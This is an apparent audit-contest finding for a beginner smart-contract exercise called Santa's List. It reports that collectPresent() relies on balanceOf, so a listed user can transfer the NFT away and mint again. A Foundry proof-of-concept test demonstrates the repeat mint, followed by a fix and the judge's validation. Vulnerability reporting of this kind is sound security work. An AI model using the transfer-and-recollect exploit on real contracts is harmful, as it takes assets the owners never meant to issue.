First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Same address can mint multiple NFT's.

ararara

Summary

Ironically , due to an insufficient check, Any user on the Nice or Extra nice list can mint and steal as many nft's as they like.

Vulnerability Details

as long as they are nice or extra nice, a user can bypass the 1 per address by just transferring to an alternate wallet and then recollecting on their original.

POC:

function testCollectMultipleNFTs() public {
address alternate_wallet = makeAddr("Users's other wallet");
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.NICE);
santasList.checkTwice(user, SantasList.Status.NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
//collect 1, try to collect a 2nd, but it reverts.
vm.startPrank(user);
santaToken.approve(address(santasList), 1e18);
santasList.collectPresent();
vm.expectRevert();
santasList.collectPresent();
//now we just transfer to our other wallet, collect a new present, rinse and repeat.
santasList.transferFrom(user,alternate_wallet, 0);
santasList.collectPresent();
vm.stopPrank();
vm.prank(alternate_wallet);
santasList.transferFrom(alternate_wallet,user, 0);
assertEq(santasList.balanceOf(user), 2);
}

Impact

High impact. Users can mint infinite number of presents.

Tools Used

Foundry testing.

Recommendations

Keep a mapping (address=>bool) to see if a user has collected their present of not.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.